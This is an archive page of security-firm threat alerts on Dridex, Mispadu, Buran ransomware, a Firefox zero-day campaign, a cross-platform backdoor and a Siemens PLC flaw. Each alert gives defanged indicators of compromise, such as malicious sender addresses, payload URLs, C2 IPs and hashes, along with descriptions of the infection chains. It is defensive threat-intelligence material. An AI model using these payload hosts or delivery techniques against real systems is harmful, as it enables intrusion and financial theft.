Archive for category Rewterz News

Rewterz Threat Alert – Malspam Campaigns Spreading Dridex Banking Trojan

Severity

High

Analysis Summary

Dridex also known as Bugat and Cridex is a form of malware that specializes in stealing bank credentials via a system that utilizes macros from Microsoft Word. Recent malspam campaigns have been observed delivering the Dridex banking malware on windows systems. The phishing emails contain a word or excel attachment with embedded macros. Once the target downloads the file and enables macros, Dridex is downloaded on the victim machine which may lead to financial theft.
The primary objective of this software is to steal banking information from users of infected machines to immediately launch fraudulent transactions. Bank information for the software installs a keyboard listener and performs injection attacks.

Impact

  • Theft of banking information
  • Fraudulent transactions
  • Financial loss

Indicators of Compromise

From Email

  • jclugo[@]nanodepot[.]mx
  • comprobantes[@]aviso[.]com[.]gt
  • trafficmxp[@]archive[.]airindia[.]it
  • rh[.]esod[@]atlanticahotels[.]com[.]br
  • atendimento[@]turboautocenter[.]com[.]br
  • info[@]centrotimarzignano[.]it
  • jcarrere[@]bld[.]com[.]ar
  • syful[@]comillaonline[.]com
  • ricardo[@]4rtransportes[.]com[.]br
  • gerentecompras[@]mayoreoferrefama[.]com
  • citas[@]portadacartagena[.]com
  • k-inagaki[@]link-vision[.]com
  • faturamentopm[@]coopmetro[.]com[.]br
  • dvalera[@]abastosbicentenario[.]gob[.]ve
  • ventas3[@]distribuidoradeaceros[.]mx
  • m[.]biec[@]gotec-group[.]com
  • informacion[@]actgrupo[.]com
  • contabilidad[@]insalus[.]es

MD5

  • ba87bd0a355d24ddc39c8cb2c7186abf
  • 05ffb09ff7900cb970c245f94506dd7f
  • 28bdba10872356b1887dcf0b70990ffc
  • a2eb8748c37efcb2ecba817b754d7871
  • 923384cd1063c03f8e0bb44965187be7
  • 9d68dec7048ab46ee26f2cf8ddfec07f
  • 1daef4e6d1e3263d364ca28b599fdd21
  • f506a9e9b77f160026f46947c18a2b8a

SHA-256

  • 6ddf5c04bca8882d1fdb7e4885c86b07876c907bd1fef61cf5545eedfc6b03e7
  • 21de494751a16dca9bce6ace38e1d7be7a7846fb1d9a4a3c4e82b0f9db6e1e0a
  • 690052ad639bf1c44de6fc385247b19f3b4254585208082bb7231cf28c3ff95e
  • d166416b665534fca9dec4b205a0c1f28fdd5dd2cb45b92be8a908c4d35f652a
  • 87011e99a114ccff3994c196876d90e0f8627b2e040884cfbbb44033bbc22ac7
  • 017d4751de322d3cfebbe452f28ea4b16f3412307c6567d9cb7790eac7dc4175
  • 5203f290148afad7aec1493d56c43d0df5710e6a7c23ea2c1326f73ed7861d90
  • 6b1b3cd62ba169a9be6e71d013a52575111b3a15d0cb3bace971031b82057411

Source IP

  • 65[.]99[.]252[.]241
  • 93[.]38[.]63[.]46
  • 103[.]229[.]85[.]12
  • 62[.]112[.]65[.]20
  • 124[.]108[.]39[.]115
  • 190[.]202[.]150[.]26
  • 198[.]1[.]68[.]89
  • 200[.]69[.]233[.]197
  • 162[.]241[.]182[.]168
  • 174[.]142[.]9[.]228
  • 72[.]47[.]249[.]132
  • 91[.]142[.]215[.]72

Remediation

  • Block the threat indicators at their respective controls.
  • Do not download files attached in emails coming from untrusted sources.
  • Do not enable macros for untrusted files.

Rewterz Threat Alert – McDonalds-Themed Facebook Malvertising Deploys Mispadu Banking Trojan

Severity

High

Analysis Summary

The Mispadu banking trojan is using a McDonalds malvertising tactic to ultimately steal payment-card data and online banking information. Written in Delphi, Mispadu targets Brazil and Mexico, uses pop-up windows and contains backdoor functionality.

Figure06_FacebookAds-300x258.png

Mispadu spreads via email as well as sponsored advertisements on Facebook. These offer fake discount coupons for McDonalds as shown above. If someone clicks the ad, they’re taken to a phony McDonalds website with a button that says, “I want!/Generate coupon.” Clicking this in turn downloads a ZIP archive to the victim machine containing an MSI installer. The MSI installer sets off a chain Visual Basic Scripts (VBS scripts) that ultimately end with a loader, which checks the language identifier of the target to verify that it is indeed located in Brazil or Mexico, sets up configuration files, connects to its command-and-control (C2) server and downloads the banking trojan. As for its backdoor functionality, Mispadu can take screenshots, simulate mouse and keyboard actions, and capture keystrokes. It collects computer fingerprinting information about its victim machines, and checks to see if regional security applications are installed on the target machine. It also of course monitors for installed banking applications, and also monitors the content of the clipboard and tries to replace potential bitcoin wallets with its own.

This malware extracts stored credentials from browsers (Google Chrome, Mozilla Firefox, Internet Explorer), and email clients (Microsoft Outlook, Mozilla Thunderbird, and Windows Live Mail, among others). Mispadu is originally an ambitious Latin American banking trojan that utilizes malvertising and extends its attack surface to web browsers. In Brazil, it was seen distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system. It also siphons list of installed common Latin American banking applications and a list of installed security products.

Impact

  • Credential Theft
  • Key logging
  • Unauthorized Remote Access
  • Theft of credit card/banking data
  • Financial loss

Indicators of Compromise

Domain Name

promoscupom[.]cf

Hostname

mcdonalds[.]promoscupom[.]cf

MD5

  • 525e86186b017bfbbdef82802dba6950
  • 54e8ded7b148a13d3363ac7b33f6eb06
  • 0ea4196141215c3148054f029fc9c96a
  • 053d613849ee008f5a1967bf0219d406
  • 024ff6c7fff97103fe81120aea96da94
  • e60bad975bbec25fe5d26298a3eafbe4

SHA-256

  • 0e3c89fa4d61b5430e3a0949b86058b0873f4c807cba87d687c81d3ad4412ed4
  • 400b411a9bffd687c5e74f51d43b7dc92cdb8d5ca9f674456b75a5d37587d342
  • 8b9e03bea2dfc1ce375cbff63927b7f0f51cbd0d8e74557e9a54c9a361e709b0
  • f3e6a1dbb374e4926f55d3905c70bf30ee59281de6fa96aa34ba6d9e624a8b0e
  • 6ed32f46a595a4097d85e7f70c74be5a57b542595088e81074ad8197901ba7aa

URL

  • http[:]//mcdonalds[.]promoscupom.cf/index1[.]html
  • http[:]//promoscupom[.]cf/ http[:]//3.19.223[.]147/br/mp1a
  • http[:]//mcdonalds.promoscupom[.]cf/index3.html
  • http[:]//mcdonalds.promoscupom[.]cf/index2.html

Remediation

  • Block the threat indicators at their respective controls.
  • Do not click on random advertisements even if they look appealing and harmless.
  • Keep browsers updated to latest versions and avoid using unnecessary extensions.

Rewterz Threat Alert – Active Exploitation of Firefox 0-Day Targets Cryptocurrency

Severity

High

Analysis Summary

An attack is detected utilizing a recent Firefox zero-day and malware payloads in order to gain access to victim’s computers, networks, and sensitive information. Mozilla released an emergency Firefox update to fix a critical remote execution vulnerability that was actively used in targeted attacks in the wild. This bug was given a CVE ID of CVE-2019-11707 while the vulnerability could be exploited for remote code execution, it would need to be chained with a sandbox escape vulnerability CVE-2019-11708 in order to affect the host operating system.

Cryptocurrency firms were the target of attacks utilizing this exploit. Their goal was most likely to gain access to corporate information, stored cryptocurrency funds, or their networks. The phishing email that allegedly initiated these attacks claimed to be an “Adam Prize Organizer” named Neil Morris who was requesting assistance from the target. This email contained a now defunct url of http://people.ds.cam.ac.uk/nm603/awards/Adams_Prize. When a user visited this URL with Firefox, the exploit would drop a malicious payload on the computer. This trojan is a Remote Access Trojan, or RAT, that would allow an attacker to gain full access to the infected computer. In addition to RAT capabilities, Netwire is designed to steal information from browsers and other applications.

Impact

  • Unauthorized Access
  • Information Theft
  • Remote Code Execution
  • System Takeover
  • Financial loss

Indicators of Compromise

Domain Name

  • athlon4free2updates1[.]com
  • analyticsfit[.]com

MD5

  • de3a8b1e149312dac5b8584a33c3f3c6
  • af10aad603fe227ca27077b83b26543b
  • 5030422b3428c0f938e3ad03720ca9e8
  • 8b2b7537c792ecf24d8ee7b9fbb942f8
  • 70286abc22eca9a9cbea24e551c891cd
  • b6f92b20816f23c147445bd5eec86a06
  • fc99b1407655674573ee4167f1e3dcbd

SHA-256

  • 07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4
  • 97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad
  • af77d91269c731b4624594826b18f8c9b3df08ac80aeae5968db55b33bd3d9f4
  • 26a0ca13e857b8f6260ceea4373cbfde1526f8d7df9cf27926959df1f63dadf5
  • 3addeebf734e6f11e755bf31b559081d9a6020358952136c330c7004e10725b6
  • a033fb94947caf6c22523af2d660b89d0c0fe6ee0ee200853312f192d29ed964
  • 46106474c1e05747a77866e6e6166b31d37e1524e3f3e7d2abca5f3c07454505

Source IP

  • 185.49.69[.]210
  • 89.34.111[.]113

URL

  • http[:]//185.162.131[.]96/i/kr http[:]//185.162.131[.]96/i/pm
  • http[:]//185.162.131[.]96/i/195/195
  • http[:]//185.162.131[.]96/i/IconServicesAgent
  • http[:]//185.162.131[.]96/i/thk http[:]//185.162.131[.]96/i/kri
  • http[:]//185.162.131[.]96 http[:]//185.162.131[.]96/i/pmi

Remediation

  • Block the threat indicators at their respective controls.
  • Immediately update Firefox to a fixed version that patches the zero-day.
  • http://www.rewterz.com/rewterz-news/rewterz-threat-advisory-cve-2019-11707-mozilla-firefox-vulnerability-exploited-in-the-wild

Rewterz Threat Alert – Buran Ransomware Infects PCs via Microsoft Excel Web Queries

Severity

High

Analysis Summary

A new spam campaign has been spotted distributing the Buran Ransomware through IQY file attachments. When opened, these Microsoft Excel Web Query attachments will execute a remote command that installs the ransomware onto a victim’s computer.

A new malspam campaign was discovered by security researcher Suspicious Link that pretends to be a simple fwd of a previous email stating that the user should “Print document in attach”.

Malspam Email

This attached document is an IQY file that when opened will execute a web query, or remote command, given by a remote server that uses PowerShell to install the Buran Ransomware. IQY files, they are Excel Web Query documents that when opened will attempt to import data into a worksheet using external sources. For example, as shown below, the attached IQY file is simply a text file that specifies its data will come from the web and be retrieved from the listed URL.

IQY Attachment

The data returned from an external source can also be an formula that is then executed by Excel when the IQY file is opened. In this particular case, the formula will launch a PowerShell command that downloads a remote Buran Ransomware executable named 1.exe, saves it to the Temp folder, and then executes it.

Remote command to execute

Like malicious macros, users first need to enable the data source, but as we have seen with other spam campaigns, too many people blindly click on the Enable button.

IQY File in Excel

If the user clicks on Enable, the 1.exe file will be downloaded and executed, which will start to encrypt the files on the computer.

Buran Encrypted Files
Buran Ransom Note

Impact

File encryption

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.
  • Users can also block IQY files in Excel.

Rewterz Threat Alert – A New Multiplatform Backdoor Targeting Linux

Severity

Medium

Analysis Summary

A New Multiplatform Backdoor targeting Linux which does not have any known connections to other threat groups.

Technical Analysis

The Linux binary is a statically linked ELF file, while the Windows binary is a dynamically linked PE file.

Both instances of this malware are practically identical in terms of overall functionality, with minor implementation differences. However, if we pay close attention to each instance we can draw some conclusions regarding the nature of the authors.

Both malware instances share the same protocol to communicate with the same CNC server. However, these instances have different delivery vectors:

2019 11 12 000451 807x440 scrot

Backdoor Analysis

The Windows variant of this malware does not represent a complex threat in terms of Windows malware. Conversely, the Linux variant shows more sophistication in regards to the implementation details used to replicate the same functionality.

2019 11 12 110915 702x99 scrot

This indicates information regarding the malware authors’ development environment preference.

The main function is not obfuscated and appears to be straightforward in logic. In the Windows variant we can see how some strings are decoded in the beginning of the function.

2019 11 12 111229 712x581 scrot
2019 11 12 112102 603x541 scrot

Impact

  • Arbitrary execution of shell commands
  • Arbitrary binary execution

Indicators of Compromise

IP

  • 185[.]198[.]56[.]53
  • 193[.]29[.]15[.]147

SHA-256

  • 5d51dbf649d34cd6927efdb6ef082f27a6ccb25a92e892800c583a881bbf9415
  • 907e1dfde652b17338d307b6a13a5af7a8f6ced93a7a71f7f65d40123b93f2b8

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the links/attachments sent by unknown senders.

Rewterz Threat Advisory – CVE-2019-13945 – ICS: Undocumented access feature in Siemens SIMATIC PLCs Code Execution Vulnerability

Severity

Medium

Analysis Summary

There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. Using this functionality requires physical access to the UART interface during boot process.

Impact

Execution arbitrary code

Affected Vendors

Siemens

Affected Products

SIMATIC S7-1200 All versions

Remediation

Apply in depth defense:

https://assets.new.siemens.com/siemens/assets/api/uuid:411e91564a2d259ecd4b6c79b51f89c044b3de81/operational-guidelines-industrial-security-en.pdf


Copyright © Rewterz. All rights reserved.